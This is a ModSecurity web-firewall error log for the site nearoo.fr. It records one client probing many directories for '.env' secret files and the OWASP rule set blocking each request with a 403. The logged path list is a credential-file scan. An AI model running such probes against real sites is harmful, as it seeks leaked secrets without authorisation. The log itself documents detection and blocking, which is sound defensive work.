[Mon May 11 16:54:29.573188 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/vendor/.env"] [unique_id "agHtpUWKUxpmnkK7zHyHFgAAAQI"]
[Mon May 11 16:54:29.573411 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/vendor/.env"] [unique_id "agHtpUWKUxpmnkK7zHyHFgAAAQI"]
[Mon May 11 16:54:29.717141 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/lib/.env"] [unique_id "agHtpUWKUxpmnkK7zHyHFwAAAQI"]
[Mon May 11 16:54:29.717405 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/lib/.env"] [unique_id "agHtpUWKUxpmnkK7zHyHFwAAAQI"]
[Mon May 11 16:54:29.717650 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/lib/.env"] [unique_id "agHtpUWKUxpmnkK7zHyHFwAAAQI"]
[Mon May 11 16:54:29.842134 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /resources/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/resources/.env"] [unique_id "agHtpUWKUxpmnkK7zHyHGAAAAQI"]
[Mon May 11 16:54:29.842397 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/resources/.env"] [unique_id "agHtpUWKUxpmnkK7zHyHGAAAAQI"]
[Mon May 11 16:54:29.842638 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/resources/.env"] [unique_id "agHtpUWKUxpmnkK7zHyHGAAAAQI"]
[Mon May 11 16:54:30.074659 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/assets/.env"] [unique_id "agHtpkWKUxpmnkK7zHyHGQAAAQI"]
[Mon May 11 16:54:30.074889 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/assets/.env"] [unique_id "agHtpkWKUxpmnkK7zHyHGQAAAQI"]
[Mon May 11 16:54:30.075115 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/assets/.env"] [unique_id "agHtpkWKUxpmnkK7zHyHGQAAAQI"]
[Mon May 11 16:54:30.232545 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/uploads/.env"] [unique_id "agHtpkWKUxpmnkK7zHyHGgAAAQI"]
[Mon May 11 16:54:30.232743 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/uploads/.env"] [unique_id "agHtpkWKUxpmnkK7zHyHGgAAAQI"]
[Mon May 11 16:54:30.232949 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/uploads/.env"] [unique_id "agHtpkWKUxpmnkK7zHyHGgAAAQI"]
[Mon May 11 16:54:30.410493 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /internal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/internal/.env"] [unique_id "agHtpkWKUxpmnkK7zHyHGwAAAQI"]
[Mon May 11 16:54:30.410714 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/internal/.env"] [unique_id "agHtpkWKUxpmnkK7zHyHGwAAAQI"]
[Mon May 11 16:54:30.410936 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/internal/.env"] [unique_id "agHtpkWKUxpmnkK7zHyHGwAAAQI"]
[Mon May 11 16:54:30.543585 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/tools/.env"] [unique_id "agHtpkWKUxpmnkK7zHyHHAAAAQI"]
[Mon May 11 16:54:30.543803 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/tools/.env"] [unique_id "agHtpkWKUxpmnkK7zHyHHAAAAQI"]
[Mon May 11 16:54:30.544027 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/tools/.env"] [unique_id "agHtpkWKUxpmnkK7zHyHHAAAAQI"]
[Mon May 11 16:54:30.908307 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /scripts/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/scripts/.env"] [unique_id "agHtpkWKUxpmnkK7zHyHHwAAAQI"]
[Mon May 11 16:54:30.908531 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/scripts/.env"] [unique_id "agHtpkWKUxpmnkK7zHyHHwAAAQI"]
[Mon May 11 16:54:30.908782 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/scripts/.env"] [unique_id "agHtpkWKUxpmnkK7zHyHHwAAAQI"]
[Mon May 11 16:54:31.062493 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/bin/.env"] [unique_id "agHtp0WKUxpmnkK7zHyHIAAAAQI"]
[Mon May 11 16:54:31.062714 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/bin/.env"] [unique_id "agHtp0WKUxpmnkK7zHyHIAAAAQI"]
[Mon May 11 16:54:31.062939 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/bin/.env"] [unique_id "agHtp0WKUxpmnkK7zHyHIAAAAQI"]
[Mon May 11 16:54:31.222820 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sbin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/sbin/.env"] [unique_id "agHtp0WKUxpmnkK7zHyHIQAAAQI"]
[Mon May 11 16:54:31.223040 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/sbin/.env"] [unique_id "agHtp0WKUxpmnkK7zHyHIQAAAQI"]
[Mon May 11 16:54:31.223299 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/sbin/.env"] [unique_id "agHtp0WKUxpmnkK7zHyHIQAAAQI"]
[Mon May 11 16:54:31.366763 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/local/.env"] [unique_id "agHtp0WKUxpmnkK7zHyHIgAAAQI"]
[Mon May 11 16:54:31.366990 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/local/.env"] [unique_id "agHtp0WKUxpmnkK7zHyHIgAAAQI"]
[Mon May 11 16:54:31.367229 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/local/.env"] [unique_id "agHtp0WKUxpmnkK7zHyHIgAAAQI"]
[Mon May 11 16:54:31.536676 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/portal/.env"] [unique_id "agHtp0WKUxpmnkK7zHyHIwAAAQI"]
[Mon May 11 16:54:31.536905 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/portal/.env"] [unique_id "agHtp0WKUxpmnkK7zHyHIwAAAQI"]
[Mon May 11 16:54:31.537168 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/portal/.env"] [unique_id "agHtp0WKUxpmnkK7zHyHIwAAAQI"]
[Mon May 11 16:54:31.679061 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dashboard/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/dashboard/.env"] [unique_id "agHtp0WKUxpmnkK7zHyHJAAAAQI"]
[Mon May 11 16:54:31.679304 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/dashboard/.env"] [unique_id "agHtp0WKUxpmnkK7zHyHJAAAAQI"]
[Mon May 11 16:54:31.679546 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/dashboard/.env"] [unique_id "agHtp0WKUxpmnkK7zHyHJAAAAQI"]
[Mon May 11 16:54:31.991697 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/panel/.env"] [unique_id "agHtp0WKUxpmnkK7zHyHJQAAAQI"]
[Mon May 11 16:54:31.991914 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/panel/.env"] [unique_id "agHtp0WKUxpmnkK7zHyHJQAAAQI"]
